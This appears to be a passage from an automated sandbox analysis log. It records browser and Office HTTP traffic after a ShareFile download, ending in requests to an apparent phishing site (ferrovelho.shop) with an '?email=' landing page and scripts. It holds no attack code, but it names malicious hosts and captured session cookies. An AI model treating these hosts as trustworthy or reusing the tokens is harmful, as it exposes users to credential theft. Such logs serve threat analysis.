AWSALBCORS=lJb0TxLRrfbL2HISKF7qPhXnsnSg0yXzoy7m0tG3kkh3lSUe2MbixaoxVUQKhIUzYpaFR18rE0u1F833pELU6pq0t9UjwB20XVhtU7Nshcek1HByNLnPbEldjX0/
            Source: global trafficHTTP traffic detected: GET /Download/a8050891-1b71-8816-99a8-d7f55d4cb952/fi3d0bc8-b618-4e82-8fd1-179ebf99008c.scenc?downloadId=dtdb85cdf89336431c98e9c6f50939c4a0&accountId=a8050891-1b71-8816-99a8-d7f55d4cb952&correlationId=IzoXVYhPWxL0a77Q3chjRg&Policy=eyJTdGF0ZW1lbnQiOlt7IlJlc291cmNlIjoiaHR0cHM6Ly9zdG9yYWdlLWNmLXVzLnNoYXJlZmlsZS5jb20vRG93bmxvYWQvYTgwNTA4OTEtMWI3MS04ODE2LTk5YTgtZDdmNTVkNGNiOTUyL2ZpM2QwYmM4LWI2MTgtNGU4Mi04ZmQxLTE3OWViZjk5MDA4Yy5zY2VuYz9kb3dubG9hZElkPWR0ZGI4NWNkZjg5MzM2NDMxYzk4ZTljNmY1MDkzOWM0YTAmYWNjb3VudElkPWE4MDUwODkxLTFiNzEtODgxNi05OWE4LWQ3ZjU1ZDRjYjk1MiZjb3JyZWxhdGlvbklkPUl6b1hWWWhQV3hMMGE3N1EzY2hqUmciLCJDb25kaXRpb24iOnsiRGF0ZUxlc3NUaGFuIjp7IkFXUzpFcG9jaFRpbWUiOjE3Mjg1ODM1NTN9fX1dfQo_&Expires=1728583553&Signature=Jvm7VvZJeWduZ68V~mfwSQFkSJmooFy4qhe9l80O4nycVmQUvvNrJQwMBKxytePP70MXd4pZuWFmIebvTvsogC0~4hyD-Uoq-4FlWh0g295UbEckWsuwD103US5dmqlC-4r52XxWQfYOt5pP7AwYps2PC0LEvAkpHv5tWqQ2doAZAgB9bk3tokFXdYSS4ptFMaj4~o-yfPpRRYW2UhYlWIDiZx4H20u0DVauW6UbmkkpJQSWA8rZ7s1UOC7cYp9MWeQGsXTyeOrIUefSNze4CfGxmq8YiDgCHaHU9l5MDkeAk13VUEmIc6zfiRYeJ11jRIDu-21OcAKckimhdojHAw__&Key-Pair-Id=K3FMEQJQYC19VP HTTP/1.1Host: storage-cf-us.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kFefy6H4XXZOUGE&MD=FZCGLLdL HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /events/1/fd14b65b5e?a=594432325&sa=1&v=1216.487a282&t=Unnamed%20Transaction&rst=66897&ck=1&ref=https://premierbb.sharefile.com/share/view/189361297164461c HTTP/1.1Host: bam.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=35f95be610a6cff2
            Source: global trafficHTTP traffic detected: GET /?email= HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://hvhuo1.timesbella.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /?email= HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://hrv56k8ryi.ferrovelho.shop/?email=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1
            Source: global trafficHTTP traffic detected: GET /m/86efbfca1e206ccf7a31f8b3bf14aa5e.htm HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://hrv56k8ryi.ferrovelho.shop/?email=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/cxx/ZXHM8GZZKMRBMPRJX9LIZJJHS HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/sm/U6UPYHP3YF8AQVXD4ZG42QH3R HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/jx/XCOMR0LVXHD2CSC9IZW3DTEPG HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/aty/L1BEWKG1JFCBQ5TPZV5GTTZQD HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/mxl/mlg.svg?RHI7QEQ4V0EAB9E08G4TRBZQT HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/mxl/sig_op.svg HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
            Source: global trafficHTTP traffic detected: GET /m/ecpt/8SP5UFUDB7ATU5HVLW4D116DG HTTP/1.1Host: hrv56k8ryi.ferrovelho.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://hrv56k8ryi.ferrovelho.shop/m/86efbfca1e206ccf7a31f8b3bf14aa5e.htmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=42bf4e2cf012fb664ab477db9d6b601c; preload=1; rt=86efbfca1e206ccf7a31f8b3bf14aa5e.htm
